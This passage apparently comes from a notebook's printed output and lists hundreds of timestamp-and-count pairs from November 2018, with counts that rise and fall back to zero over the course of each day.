"['2018-11-26 12:26:21', '27']\n",
"['2018-11-26 12:27:49', '30']\n",
"['2018-11-26 12:29:17', '28']\n",
"['2018-11-26 12:30:44', '18']\n",
"['2018-11-26 12:32:12', '22']\n",
"['2018-11-26 12:33:40', '23']\n",
"['2018-11-26 12:35:08', '21']\n",
"['2018-11-26 12:36:36', '22']\n",
"['2018-11-26 12:38:03', '26']\n",
"['2018-11-26 12:39:31', '27']\n",
"['2018-11-26 12:40:59', '23']\n",
"['2018-11-26 12:42:27', '23']\n",
"['2018-11-26 12:43:55', '21']\n",
"['2018-11-26 12:45:22', '16']\n",
"['2018-11-26 12:46:50', '14']\n",
"['2018-11-26 12:48:18', '14']\n",
"['2018-11-26 12:49:46', '14']\n",
"['2018-11-26 12:51:14', '13']\n",
"['2018-11-26 12:52:41', '10']\n",
"['2018-11-26 12:54:09', '9']\n",
"['2018-11-26 12:55:37', '6']\n",
"['2018-11-26 12:57:05', '0']\n",
"['2018-11-26 12:58:33', '4']\n",
"['2018-11-26 12:59:14', '4']\n",
"['2018-11-26 12:59:34', '4']\n",
"['2018-11-26 13:00:15', '4']\n",
"['2018-11-26 13:00:50', '4']\n",
"['2018-11-26 13:02:04', '6']\n",
"['2018-11-26 13:02:16', '7']\n",
"['2018-11-26 13:02:43', '8']\n",
"['2018-11-26 13:03:48', '8']\n",
"['2018-11-26 13:05:34', '9']\n",
"['2018-11-26 13:06:17', '13']\n",
"['2018-11-26 13:06:55', '13']\n",
"['2018-11-26 13:08:14', '12']\n",
"['2018-11-26 13:08:58', '12']\n",
"['2018-11-26 13:09:42', '15']\n",
"['2018-11-26 13:11:01', '11']\n",
"['2018-11-26 13:15:09', '27']\n",
"['2018-11-26 13:16:57', '28']\n",
"['2018-11-26 13:18:20', '27']\n",
"['2018-11-26 13:19:19', '27']\n",
"['2018-11-26 13:21:33', '36']\n",
"['2018-11-26 13:23:25', '39']\n",
"['2018-11-26 13:25:20', '45']\n",
"['2018-11-26 13:26:30', '43']\n",
"['2018-11-26 13:27:34', '42']\n",
"['2018-11-26 13:28:42', '41']\n",
"['2018-11-26 13:30:14', '41']\n",
"['2018-11-26 13:31:20', '36']\n",
"['2018-11-26 13:32:51', '35']\n",
"['2018-11-26 13:33:49', '35']\n",
"['2018-11-26 13:34:21', '35']\n",
"['2018-11-26 13:34:39', '35']\n",
"['2018-11-26 13:35:22', '30']\n",
"['2018-11-26 13:36:15', '30']\n",
"['2018-11-26 13:37:33', '29']\n",
"['2018-11-26 13:38:38', '29']\n",
"['2018-11-26 13:39:29', '29']\n",
"['2018-11-26 13:40:00', '29']\n",
"['2018-11-26 13:41:31', '27']\n",
"['2018-11-26 13:42:50', '26']\n",
"['2018-11-26 13:43:36', '25']\n",
"['2018-11-26 13:44:48', '18']\n",
"['2018-11-26 13:49:50', '7']\n",
"['2018-11-26 13:51:09', '0']\n",
"['2018-11-26 13:52:50', '20']\n",
"['2018-11-26 13:54:31', '39']\n",
"['2018-11-26 13:56:12', '42']\n",
"['2018-11-26 13:57:54', '44']\n",
"['2018-11-26 13:59:35', '44']\n",
"['2018-11-26 14:01:16', '49']\n",
"['2018-11-26 14:02:57', '54']\n",
"['2018-11-26 14:04:39', '56']\n",
"['2018-11-26 14:06:20', '59']\n",
"['2018-11-26 14:08:01', '59']\n",
"['2018-11-26 14:09:42', '61']\n",
"['2018-11-26 14:11:24', '58']\n",
"['2018-11-26 14:13:05', '58']\n",
"['2018-11-26 14:14:46', '56']\n",
"['2018-11-26 14:16:27', '53']\n",
"['2018-11-26 14:18:09', '78']\n",
"['2018-11-26 14:19:50', '75']\n",
"['2018-11-26 14:21:31', '87']\n",
"['2018-11-26 14:23:12', '82']\n",
"['2018-11-26 14:24:54', '83']\n",
"['2018-11-26 14:26:35', '94']\n",
"['2018-11-26 14:28:16', '99']\n",
"['2018-11-26 14:29:57', '101']\n",
"['2018-11-26 14:31:39', '99']\n",
"['2018-11-26 14:33:20', '129']\n",
"['2018-11-26 14:35:01', '104']\n",
"['2018-11-26 14:36:42', '100']\n",
"['2018-11-26 14:38:24', '94']\n",
"['2018-11-26 14:40:05', '91']\n",
"['2018-11-26 14:41:46', '90']\n",
"['2018-11-26 14:43:27', '85']\n",
"['2018-11-26 14:45:09', '84']\n",
"['2018-11-26 14:46:50', '77']\n",
"['2018-11-26 14:48:31', '55']\n",
"['2018-11-26 14:50:12', '44']\n",
"['2018-11-26 14:51:54', '42']\n",
"['2018-11-26 14:53:35', '41']\n",
"['2018-11-26 14:55:16', '29']\n",
"['2018-11-26 14:56:57', '27']\n",
"['2018-11-26 14:58:39', '20']\n",
"['2018-11-26 15:00:20', '13']\n",
"['2018-11-26 15:02:01', '6']\n",
"['2018-11-26 15:03:42', '0']\n",
"['2018-11-26 15:05:24', '1']\n",
"['2018-11-26 15:07:32', '2']\n",
"['2018-11-26 15:08:16', '5']\n",
"['2018-11-26 15:08:52', '7']\n",
"['2018-11-26 15:09:33', '8']\n",
"['2018-11-26 15:10:38', '9']\n",
"['2018-11-26 15:11:09', '10']\n",
"['2018-11-26 15:11:59', '11']\n",
"['2018-11-26 15:12:59', '12']\n",
"['2018-11-26 15:14:39', '12']\n",
"['2018-11-26 15:14:51', '15']\n",
"['2018-11-26 15:15:21', '15']\n",
"['2018-11-26 15:16:45', '15']\n",
"['2018-11-26 15:16:53', '15']\n",
"['2018-11-26 15:18:26', '12']\n",
"['2018-11-26 15:19:45', '12']\n",
"['2018-11-26 15:21:00', '15']\n",
"['2018-11-26 15:23:37', '16']\n",
"['2018-11-26 15:25:13', '17']\n",
"['2018-11-26 15:27:02', '17']\n",
"['2018-11-26 15:27:40', '24']\n",
"['2018-11-26 15:29:26', '24']\n",
"['2018-11-26 15:30:19', '23']\n",
"['2018-11-26 15:31:37', '20']\n",
"['2018-11-26 15:33:28', '24']\n",
"['2018-11-26 15:34:32', '28']\n",
"['2018-11-26 15:35:34', '30']\n",
"['2018-11-26 15:37:58', '29']\n",
"['2018-11-26 15:40:40', '30']\n",
"['2018-11-26 15:41:23', '30']\n",
"['2018-11-26 15:42:24', '28']\n",
"['2018-11-26 15:42:37', '31']\n",
"['2018-11-26 15:43:42', '30']\n",
"['2018-11-26 15:44:22', '29']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 15:46:06', '31']\n",
"['2018-11-26 15:47:05', '31']\n",
"['2018-11-26 15:48:19', '28']\n",
"['2018-11-26 15:48:52', '22']\n",
"['2018-11-26 15:50:51', '19']\n",
"['2018-11-26 15:52:10', '13']\n",
"['2018-11-26 15:52:58', '8']\n",
"['2018-11-26 15:53:30', '6']\n",
"['2018-11-26 16:02:30', '0']\n",
"['2018-11-26 16:03:46', '0']\n",
"['2018-11-26 16:04:58', '8']\n",
"['2018-11-26 16:06:11', '13']\n",
"['2018-11-26 16:07:24', '16']\n",
"['2018-11-26 16:08:37', '16']\n",
"['2018-11-26 16:09:49', '22']\n",
"['2018-11-26 16:11:02', '22']\n",
"['2018-11-26 16:12:15', '23']\n",
"['2018-11-26 16:13:28', '21']\n",
"['2018-11-26 16:14:40', '21']\n",
"['2018-11-26 16:15:53', '19']\n",
"['2018-11-26 16:17:06', '20']\n",
"['2018-11-26 16:18:19', '23']\n",
"['2018-11-26 16:19:32', '22']\n",
"['2018-11-26 16:20:44', '28']\n",
"['2018-11-26 16:21:57', '28']\n",
"['2018-11-26 16:23:10', '24']\n",
"['2018-11-26 16:24:23', '26']\n",
"['2018-11-26 16:25:35', '28']\n",
"['2018-11-26 16:26:48', '32']\n",
"['2018-11-26 16:28:01', '32']\n",
"['2018-11-26 16:29:14', '31']\n",
"['2018-11-26 16:30:27', '28']\n",
"['2018-11-26 16:31:39', '27']\n",
"['2018-11-26 16:32:52', '30']\n",
"['2018-11-26 16:34:05', '28']\n",
"['2018-11-26 16:35:18', '28']\n",
"['2018-11-26 16:36:30', '26']\n",
"['2018-11-26 16:37:43', '25']\n",
"['2018-11-26 16:38:56', '29']\n",
"['2018-11-26 16:40:09', '25']\n",
"['2018-11-26 16:41:21', '28']\n",
"['2018-11-26 16:42:34', '27']\n",
"['2018-11-26 16:43:47', '27']\n",
"['2018-11-26 16:45:00', '25']\n",
"['2018-11-26 16:46:13', '21']\n",
"['2018-11-26 16:47:25', '22']\n",
"['2018-11-26 16:48:38', '25']\n",
"['2018-11-26 16:49:51', '20']\n",
"['2018-11-26 16:51:04', '17']\n",
"['2018-11-26 16:52:16', '13']\n",
"['2018-11-26 16:53:29', '13']\n",
"['2018-11-26 16:54:42', '0']\n",
"['2018-11-26 16:55:55', '0']\n",
"['2018-11-26 16:57:08', '5']\n",
"['2018-11-26 16:57:57', '7']\n",
"['2018-11-26 16:58:20', '9']\n",
"['2018-11-26 16:59:10', '9']\n",
"['2018-11-26 17:00:07', '10']\n",
"['2018-11-26 17:00:54', '10']\n",
"['2018-11-26 17:01:35', '8']\n",
"['2018-11-26 17:02:37', '12']\n",
"['2018-11-26 17:03:46', '12']\n",
"['2018-11-26 17:06:03', '17']\n",
"['2018-11-26 17:06:50', '17']\n",
"['2018-11-26 17:07:29', '17']\n",
"['2018-11-26 17:08:37', '16']\n",
"['2018-11-26 17:08:47', '15']\n",
"['2018-11-26 17:10:09', '16']\n",
"['2018-11-26 17:11:10', '14']\n",
"['2018-11-26 17:15:09', '16']\n",
"['2018-11-26 17:18:00', '16']\n",
"['2018-11-26 17:20:10', '17']\n",
"['2018-11-26 17:22:06', '18']\n",
"['2018-11-26 17:23:05', '20']\n",
"['2018-11-26 17:24:21', '20']\n",
"['2018-11-26 17:25:44', '17']\n",
"['2018-11-26 17:27:06', '18']\n",
"['2018-11-26 17:28:14', '18']\n",
"['2018-11-26 17:29:02', '18']\n",
"['2018-11-26 17:30:23', '14']\n",
"['2018-11-26 17:31:20', '15']\n",
"['2018-11-26 17:33:47', '17']\n",
"['2018-11-26 17:34:50', '17']\n",
"['2018-11-26 17:35:17', '21']\n",
"['2018-11-26 17:36:02', '17']\n",
"['2018-11-26 17:37:19', '18']\n",
"['2018-11-26 17:38:40', '11']\n",
"['2018-11-26 17:40:04', '9']\n",
"['2018-11-26 17:41:09', '7']\n",
"['2018-11-26 17:42:02', '7']\n",
"['2018-11-26 17:42:34', '7']\n",
"['2018-11-26 17:44:39', '7']\n",
"['2018-11-26 17:45:37', '7']\n",
"['2018-11-26 17:45:57', '7']\n",
"['2018-11-26 17:47:08', '7']\n",
"['2018-11-26 17:52:14', '4']\n",
"['2018-11-26 17:53:27', '0']\n",
"['2018-11-26 17:54:56', '4']\n",
"['2018-11-26 17:56:26', '7']\n",
"['2018-11-26 17:57:56', '7']\n",
"['2018-11-26 17:59:26', '9']\n",
"['2018-11-26 18:00:56', '13']\n",
"['2018-11-26 18:02:26', '11']\n",
"['2018-11-26 18:03:56', '14']\n",
"['2018-11-26 18:05:26', '11']\n",
"['2018-11-26 18:06:56', '15']\n",
"['2018-11-26 18:08:26', '15']\n",
"['2018-11-26 18:09:56', '16']\n",
"['2018-11-26 18:11:25', '16']\n",
"['2018-11-26 18:12:55', '16']\n",
"['2018-11-26 18:14:25', '18']\n",
"['2018-11-26 18:15:55', '19']\n",
"['2018-11-26 18:17:25', '14']\n",
"['2018-11-26 18:18:55', '19']\n",
"['2018-11-26 18:20:25', '13']\n",
"['2018-11-26 18:21:55', '11']\n",
"['2018-11-26 18:23:25', '12']\n",
"['2018-11-26 18:24:55', '13']\n",
"['2018-11-26 18:26:25', '13']\n",
"['2018-11-26 18:27:54', '12']\n",
"['2018-11-26 18:29:24', '12']\n",
"['2018-11-26 18:30:54', '13']\n",
"['2018-11-26 18:32:24', '13']\n",
"['2018-11-26 18:33:54', '15']\n",
"['2018-11-26 18:35:24', '12']\n",
"['2018-11-26 18:36:54', '15']\n",
"['2018-11-26 18:38:24', '15']\n",
"['2018-11-26 18:39:54', '13']\n",
"['2018-11-26 18:41:24', '14']\n",
"['2018-11-26 18:42:54', '13']\n",
"['2018-11-26 18:44:23', '16']\n",
"['2018-11-26 18:45:53', '14']\n",
"['2018-11-26 18:47:23', '14']\n",
"['2018-11-26 18:48:53', '14']\n",
"['2018-11-26 18:50:23', '14']\n",
"['2018-11-26 18:51:53', '11']\n",
"['2018-11-26 18:53:23', '8']\n",
"['2018-11-26 18:54:53', '3']\n",
"['2018-11-26 18:56:23', '0']\n",
"['2018-11-26 18:57:53', '0']\n",
"['2018-11-26 18:59:23', '6']\n",
"['2018-11-26 19:00:10', '11']\n",
"['2018-11-26 19:00:33', '14']\n",
"['2018-11-26 19:01:15', '14']\n",
"['2018-11-26 19:01:57', '18']\n",
"['2018-11-26 19:03:11', '20']\n",
"['2018-11-26 19:03:58', '19']\n",
"['2018-11-26 19:04:25', '20']\n",
"['2018-11-26 19:05:06', '20']\n",
"['2018-11-26 19:06:49', '24']\n",
"['2018-11-26 19:07:33', '26']\n",
"['2018-11-26 19:08:05', '22']\n",
"['2018-11-26 19:09:27', '25']\n",
"['2018-11-26 19:09:36', '25']\n",
"['2018-11-26 19:11:13', '26']\n",
"['2018-11-26 19:12:03', '26']\n",
"['2018-11-26 19:15:31', '22']\n",
"['2018-11-26 19:17:17', '23']\n",
"['2018-11-26 19:19:13', '21']\n",
"['2018-11-26 19:21:18', '21']\n",
"['2018-11-26 19:21:31', '18']\n",
"['2018-11-26 19:23:06', '17']\n",
"['2018-11-26 19:24:07', '16']\n",
"['2018-11-26 19:25:17', '14']\n",
"['2018-11-26 19:26:36', '13']\n",
"['2018-11-26 19:27:41', '12']\n",
"['2018-11-26 19:28:29', '10']\n",
"['2018-11-26 19:29:23', '11']\n",
"['2018-11-26 19:32:40', '12']\n",
"['2018-11-26 19:34:06', '12']\n",
"['2018-11-26 19:35:15', '14']\n",
"['2018-11-26 19:35:33', '12']\n",
"['2018-11-26 19:36:35', '15']\n",
"['2018-11-26 19:37:17', '15']\n",
"['2018-11-26 19:38:59', '16']\n",
"['2018-11-26 19:40:02', '13']\n",
"['2018-11-26 19:40:51', '13']\n",
"['2018-11-26 19:41:22', '13']\n",
"['2018-11-26 19:43:21', '13']\n",
"['2018-11-26 19:44:19', '6']\n",
"['2018-11-26 19:44:40', '6']\n",
"['2018-11-26 19:45:54', '6']\n",
"['2018-11-26 19:50:52', '0']\n",
"['2018-11-26 19:52:19', '0']\n",
"['2018-11-26 19:59:43', '11']\n",
"['2018-11-26 20:00:28', '18']\n",
"['2018-11-26 20:04:16', '24']\n",
"['2018-11-26 20:05:02', '24']\n",
"['2018-11-26 20:06:04', '29']\n",
"['2018-11-26 20:06:53', '34']\n",
"['2018-11-26 20:08:30', '39']\n",
"['2018-11-26 20:09:37', '43']\n",
"['2018-11-26 20:11:33', '46']\n",
"['2018-11-26 20:12:05', '42']\n",
"['2018-11-26 20:12:47', '42']\n",
"['2018-11-26 20:13:46', '42']\n",
"['2018-11-26 20:15:44', '41']\n",
"['2018-11-26 20:16:39', '43']\n",
"['2018-11-26 20:18:01', '43']\n",
"['2018-11-26 20:19:12', '46']\n",
"['2018-11-26 20:20:41', '51']\n",
"['2018-11-26 20:21:09', '52']\n",
"['2018-11-26 20:22:25', '54']\n",
"['2018-11-26 20:24:21', '48']\n",
"['2018-11-26 20:26:15', '50']\n",
"['2018-11-26 20:28:00', '51']\n",
"['2018-11-26 20:28:59', '51']\n",
"['2018-11-26 20:29:52', '55']\n",
"['2018-11-26 20:32:26', '47']\n",
"['2018-11-26 20:34:49', '44']\n",
"['2018-11-26 20:35:48', '44']\n",
"['2018-11-26 20:37:18', '44']\n",
"['2018-11-26 20:38:23', '46']\n",
"['2018-11-26 20:39:22', '41']\n",
"['2018-11-26 20:40:24', '43']\n",
"['2018-11-26 20:40:39', '34']\n",
"['2018-11-26 20:42:20', '33']\n",
"['2018-11-26 20:43:03', '28']\n",
"['2018-11-26 20:44:09', '31']\n",
"['2018-11-26 20:44:56', '29']\n",
"['2018-11-26 20:45:31', '29']\n",
"['2018-11-26 20:46:20', '23']\n",
"['2018-11-26 20:47:01', '18']\n",
"['2018-11-26 20:47:56', '10']\n",
"['2018-11-26 20:48:50', '0']\n",
"['2018-11-26 20:52:17', '0']\n",
"['2018-11-26 20:55:44', '0']\n",
"['2018-11-26 20:59:12', '6']\n",
"['2018-11-26 20:59:45', '7']\n",
"['2018-11-26 21:00:43', '9']\n",
"['2018-11-26 21:00:52', '9']\n",
"['2018-11-26 21:01:51', '12']\n",
"['2018-11-26 21:02:30', '12']\n",
"['2018-11-26 21:03:13', '14']\n",
"['2018-11-26 21:03:40', '16']\n",
"['2018-11-26 21:04:50', '16']\n",
"['2018-11-26 21:06:32', '19']\n",
"['2018-11-26 21:07:19', '19']\n",
"['2018-11-26 21:07:53', '21']\n",
"['2018-11-26 21:08:47', '21']\n",
"['2018-11-26 21:09:21', '21']\n",
"['2018-11-26 21:10:30', '20']\n",
"['2018-11-26 21:11:45', '20']\n",
"['2018-11-26 21:15:45', '25']\n",
"['2018-11-26 21:17:47', '23']\n",
"['2018-11-26 21:20:06', '16']\n",
"['2018-11-26 21:21:41', '18']\n",
"['2018-11-26 21:22:04', '16']\n",
"['2018-11-26 21:23:37', '17']\n",
"['2018-11-26 21:24:05', '17']\n",
"['2018-11-26 21:25:05', '15']\n",
"['2018-11-26 21:26:50', '16']\n",
"['2018-11-26 21:27:35', '16']\n",
"['2018-11-26 21:28:47', '15']\n",
"['2018-11-26 21:30:45', '17']\n",
"['2018-11-26 21:31:34', '14']\n",
"['2018-11-26 21:32:35', '16']\n",
"['2018-11-26 21:33:03', '21']\n",
"['2018-11-26 21:33:20', '17']\n",
"['2018-11-26 21:33:55', '17']\n",
"['2018-11-26 21:34:41', '17']\n",
"['2018-11-26 21:35:49', '17']\n",
"['2018-11-26 21:36:51', '16']\n",
"['2018-11-26 21:37:38', '14']\n",
"['2018-11-26 21:38:08', '11']\n",
"['2018-11-26 21:41:30', '11']\n",
"['2018-11-26 21:42:58', '0']\n",
"['2018-11-26 21:45:55', '4']\n",
"['2018-11-26 21:46:29', '9']\n",
"['2018-11-26 21:50:25', '9']\n",
"['2018-11-26 21:51:11', '11']\n",
"['2018-11-26 21:52:07', '11']\n",
"['2018-11-26 21:52:48', '14']\n",
"['2018-11-26 21:54:09', '14']\n",
"['2018-11-26 21:54:32', '17']\n",
"['2018-11-26 21:55:25', '17']\n",
"['2018-11-26 21:56:19', '21']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 21:56:55', '22']\n",
"['2018-11-26 21:57:18', '22']\n",
"['2018-11-26 21:57:59', '26']\n",
"['2018-11-26 21:58:57', '23']\n",
"['2018-11-26 21:59:58', '23']\n",
"['2018-11-26 22:01:11', '22']\n",
"['2018-11-26 22:01:28', '24']\n",
"['2018-11-26 22:01:56', '22']\n",
"['2018-11-26 22:02:46', '18']\n",
"['2018-11-26 22:03:29', '18']\n",
"['2018-11-26 22:05:02', '15']\n",
"['2018-11-26 22:05:49', '15']\n",
"['2018-11-26 22:07:44', '10']\n",
"['2018-11-26 22:08:22', '10']\n",
"['2018-11-26 22:10:44', '0']\n",
"['2018-11-22 07:00:05', '1']\n",
"['2018-11-22 07:00:45', '1']\n",
"['2018-11-22 07:01:57', '1']\n",
"['2018-11-22 07:02:54', '1']\n",
"['2018-11-22 07:03:47', '2']\n",
"['2018-11-22 07:05:11', '5']\n",
"['2018-11-22 07:05:29', '5']\n",
"['2018-11-22 07:05:57', '6']\n",
"['2018-11-22 07:06:51', '8']\n",
"['2018-11-22 07:07:43', '7']\n",
"['2018-11-22 07:08:47', '8']\n",
"['2018-11-22 07:09:31', '7']\n",
"['2018-11-22 07:10:57', '7']\n",
"['2018-11-22 07:11:29', '7']\n",
"['2018-11-22 07:12:15', '0']\n",
"['2018-11-22 07:16:08', '2']\n",
"['2018-11-22 07:18:14', '2']\n",
"['2018-11-22 07:18:57', '2']\n",
"['2018-11-22 07:19:40', '2']\n",
"['2018-11-22 07:20:08', '2']\n",
"['2018-11-22 07:20:42', '3']\n",
"['2018-11-22 07:21:48', '3']\n",
"['2018-11-22 07:22:24', '2']\n",
"['2018-11-22 07:23:53', '2']\n",
"['2018-11-22 07:24:58', '0']\n",
"['2018-11-22 07:26:05', '0']\n",
"['2018-11-22 07:26:59', '0']\n",
"['2018-11-22 07:28:43', '0']\n",
"['2018-11-22 07:29:59', '0']\n",
"['2018-11-22 07:30:36', '0']\n",
"['2018-11-22 07:32:20', '0']\n",
"['2018-11-22 07:34:06', '0']\n",
"['2018-11-22 07:35:00', '0']\n",
"['2018-11-22 07:35:54', '0']\n",
"['2018-11-22 07:36:48', '0']\n",
"['2018-11-22 07:37:42', '1']\n",
"['2018-11-22 07:38:24', '1']\n",
"['2018-11-22 07:38:53', '0']\n",
"['2018-11-22 07:45:09', '1']\n",
"['2018-11-22 07:45:25', '1']\n",
"['2018-11-22 07:47:13', '1']\n",
"['2018-11-22 07:49:32', '2']\n",
"['2018-11-22 07:50:46', '2']\n",
"['2018-11-22 07:51:12', '2']\n",
"['2018-11-22 07:52:08', '3']\n",
"['2018-11-22 07:53:31', '5']\n",
"['2018-11-22 07:54:23', '10']\n",
"['2018-11-22 07:55:31', '10']\n",
"['2018-11-22 07:56:19', '10']\n",
"['2018-11-22 07:56:52', '10']\n",
"['2018-11-22 07:57:45', '10']\n",
"['2018-11-22 07:58:28', '9']\n",
"['2018-11-22 08:00:55', '9']\n",
"['2018-11-22 08:01:18', '9']\n",
"['2018-11-22 08:03:14', '9']\n",
"['2018-11-22 08:03:36', '9']\n",
"['2018-11-22 08:05:28', '0']\n",
"['2018-11-22 08:11:04', '15']\n",
"['2018-11-22 08:14:52', '13']\n",
"['2018-11-22 08:15:05', '13']\n",
"['2018-11-22 08:16:09', '11']\n",
"['2018-11-22 08:17:13', '11']\n",
"['2018-11-22 08:18:17', '11']\n",
"['2018-11-22 08:19:30', '11']\n",
"['2018-11-22 08:22:13', '11']\n",
"['2018-11-22 08:23:14', '7']\n",
"['2018-11-22 08:24:16', '4']\n",
"['2018-11-22 08:25:18', '2']\n",
"['2018-11-22 08:26:20', '1']\n",
"['2018-11-22 08:27:20', '1']\n",
"['2018-11-22 08:28:40', '1']\n",
"['2018-11-22 08:29:37', '1']\n",
"['2018-11-22 08:30:34', '1']\n",
"['2018-11-22 08:31:31', '1']\n",
"['2018-11-22 08:32:29', '5']\n",
"['2018-11-22 08:33:34', '6']\n",
"['2018-11-22 08:35:47', '6']\n",
"['2018-11-22 08:36:23', '6']\n",
"['2018-11-22 08:36:31', '7']\n",
"['2018-11-22 08:37:22', '0']\n",
"['2018-11-22 08:38:53', '17']\n",
"['2018-11-22 08:40:24', '25']\n",
"['2018-11-22 08:41:55', '27']\n",
"['2018-11-22 08:43:27', '28']\n",
"['2018-11-22 08:44:58', '42']\n",
"['2018-11-22 08:46:29', '42']\n",
"['2018-11-22 08:48:01', '41']\n",
"['2018-11-22 08:49:32', '45']\n",
"['2018-11-22 08:51:03', '52']\n",
"['2018-11-22 08:52:35', '36']\n",
"['2018-11-22 08:54:06', '35']\n",
"['2018-11-22 08:55:37', '36']\n",
"['2018-11-22 08:57:08', '25']\n",
"['2018-11-22 08:58:40', '23']\n",
"['2018-11-22 09:00:11', '13']\n",
"['2018-11-22 09:01:42', '5']\n",
"['2018-11-22 09:03:14', '5']\n",
"['2018-11-22 09:04:45', '5']\n",
"['2018-11-22 09:06:16', '0']\n",
"['2018-11-22 09:07:48', '18']\n",
"['2018-11-22 09:12:29', '26']\n",
"['2018-11-22 09:23:47', '20']\n",
"['2018-11-22 09:24:18', '20']\n",
"['2018-11-22 09:24:50', '17']\n",
"['2018-11-22 09:25:21', '13']\n",
"['2018-11-22 09:25:53', '9']\n",
"['2018-11-22 09:26:24', '6']\n",
"['2018-11-22 09:26:56', '4']\n",
"['2018-11-22 09:27:27', '3']\n",
"['2018-11-22 09:27:59', '3']\n",
"['2018-11-22 09:28:30', '3']\n",
"['2018-11-22 09:29:02', '2']\n",
"['2018-11-22 09:29:34', '1']\n",
"['2018-11-22 09:30:06', '1']\n",
"['2018-11-22 09:31:17', '1']\n",
"['2018-11-22 09:32:28', '0']\n",
"['2018-11-22 09:33:22', '0']\n",
"['2018-11-22 09:34:06', '0']\n",
"['2018-11-22 09:36:00', '0']\n",
"['2018-11-22 09:37:55', '0']\n",
"['2018-11-22 09:39:49', '0']\n",
"['2018-11-22 09:41:44', '0']\n",
"['2018-11-22 09:43:39', '0']\n",
"['2018-11-22 09:45:15', '1']\n",
"['2018-11-22 09:46:51', '2']\n",
"['2018-11-22 09:47:56', '2']\n",
"['2018-11-22 09:49:02', '3']\n",
"['2018-11-22 09:50:07', '4']\n",
"['2018-11-22 09:51:13', '7']\n",
"['2018-11-22 09:55:01', '16']\n",
"['2018-11-22 09:58:49', '18']\n",
"['2018-11-22 10:02:38', '26']\n",
"['2018-11-22 10:06:26', '29']\n",
"['2018-11-22 10:10:15', '29']\n",
"['2018-11-22 10:14:03', '39']\n",
"['2018-11-22 10:17:52', '35']\n",
"['2018-11-22 10:17:59', '32']\n",
"['2018-11-22 10:18:07', '33']\n",
"['2018-11-22 10:18:15', '33']\n",
"['2018-11-22 10:18:23', '33']\n",
"['2018-11-22 10:18:30', '0']\n",
"['2018-11-22 10:18:38', '18']\n",
"['2018-11-22 10:18:46', '18']\n",
"['2018-11-22 10:18:54', '17']\n",
"['2018-11-22 10:19:01', '14']\n",
"['2018-11-22 10:19:09', '14']\n",
"['2018-11-22 10:19:17', '12']\n",
"['2018-11-22 10:19:25', '9']\n",
"['2018-11-22 10:19:33', '7']\n",
"['2018-11-22 10:20:57', '6']\n",
"['2018-11-22 10:22:47', '4']\n",
"['2018-11-22 10:23:34', '2']\n",
"['2018-11-22 10:24:45', '2']\n",
"['2018-11-22 10:26:16', '2']\n",
"['2018-11-22 10:27:48', '2']\n",
"['2018-11-22 10:29:20', '2']\n",
"['2018-11-22 10:30:52', '2']\n",
"['2018-11-22 10:32:24', '1']\n",
"['2018-11-22 10:33:56', '0']\n",
"['2018-11-22 10:35:27', '0']\n",
"['2018-11-22 10:36:59', '0']\n",
"['2018-11-22 10:38:31', '3']\n",
"['2018-11-22 10:40:03', '4']\n",
"['2018-11-22 10:41:35', '0']\n",
"['2018-11-22 10:43:07', '7']\n",
"['2018-11-22 10:44:38', '8']\n",
"['2018-11-22 10:46:10', '8']\n",
"['2018-11-22 10:47:42', '8']\n",
"['2018-11-22 10:49:14', '9']\n",
"['2018-11-22 10:50:46', '11']\n",
"['2018-11-22 10:52:18', '11']\n",
"['2018-11-22 10:53:49', '13']\n",
"['2018-11-22 10:55:21', '16']\n",
"['2018-11-22 10:56:53', '16']\n",
"['2018-11-22 10:58:25', '15']\n",
"['2018-11-22 10:59:57', '14']\n",
"['2018-11-22 11:01:29', '12']\n",
"['2018-11-22 11:03:00', '12']\n",
"['2018-11-22 11:04:32', '8']\n",
"['2018-11-22 11:06:04', '9']\n",
"['2018-11-22 11:07:36', '8']\n",
"['2018-11-22 11:09:08', '8']\n",
"['2018-11-22 11:10:40', '0']\n",
"['2018-11-22 11:12:12', '13']\n",
"['2018-11-22 11:13:11', '15']\n",
"['2018-11-22 11:15:11', '17']\n",
"['2018-11-22 11:16:45', '17']\n",
"['2018-11-22 11:17:49', '16']\n",
"['2018-11-22 11:19:19', '15']\n",
"['2018-11-22 11:20:23', '16']\n",
"['2018-11-22 11:21:50', '13']\n",
"['2018-11-22 11:23:24', '10']\n",
"['2018-11-22 11:24:57', '4']\n",
"['2018-11-22 11:25:19', '4']\n",
"['2018-11-22 11:26:22', '5']\n",
"['2018-11-22 11:27:59', '5']\n",
"['2018-11-22 11:28:56', '6']\n",
"['2018-11-22 11:30:06', '6']\n",
"['2018-11-22 11:31:17', '6']\n",
"['2018-11-22 11:32:25', '2']\n",
"['2018-11-22 11:33:22', '2']\n",
"['2018-11-22 11:34:20', '1']\n",
"['2018-11-22 11:35:17', '1']\n",
"['2018-11-22 11:36:15', '1']\n",
"['2018-11-22 11:36:46', '1']\n",
"['2018-11-22 11:37:11', '0']\n",
"['2018-11-22 11:43:52', '3']\n",
"['2018-11-22 11:44:04', '4']\n",
"['2018-11-22 11:45:41', '4']\n",
"['2018-11-22 11:47:26', '4']\n",
"['2018-11-22 11:48:29', '4']\n",
"['2018-11-22 11:49:05', '4']\n",
"['2018-11-22 11:50:01', '5']\n",
"['2018-11-22 11:51:41', '10']\n",
"['2018-11-22 11:53:12', '10']\n",
"['2018-11-22 11:54:22', '10']\n",
"['2018-11-22 11:54:43', '10']\n",
"['2018-11-22 11:56:25', '13']\n",
"['2018-11-22 11:57:49', '11']\n",
"['2018-11-22 11:59:07', '6']\n",
"['2018-11-22 12:01:19', '3']\n",
"['2018-11-22 12:03:39', '3']\n",
"['2018-11-22 12:06:34', '3']\n",
"['2018-11-22 12:07:39', '3']\n",
"['2018-11-22 12:08:23', '0']\n",
"['2018-11-22 12:11:17', '2']\n",
"['2018-11-22 12:12:33', '2']\n",
"['2018-11-22 12:14:39', '3']\n",
"['2018-11-22 12:18:05', '2']\n",
"['2018-11-22 12:18:24', '3']\n",
"['2018-11-22 12:20:27', '5']\n",
"['2018-11-22 12:21:58', '5']\n",
"['2018-11-22 12:22:39', '5']\n",
"['2018-11-22 12:23:06', '5']\n",
"['2018-11-22 12:24:55', '2']\n",
"['2018-11-22 12:25:49', '1']\n",
"['2018-11-22 12:27:00', '0']\n",
"['2018-11-22 12:28:42', '0']\n",
"['2018-11-22 12:29:41', '0']\n",
"['2018-11-22 12:30:16', '0']\n",
"['2018-11-22 12:31:35', '0']\n",
"['2018-11-22 12:32:57', '0']\n",
"['2018-11-22 12:33:39', '0']\n",
"['2018-11-22 12:34:21', '0']\n",
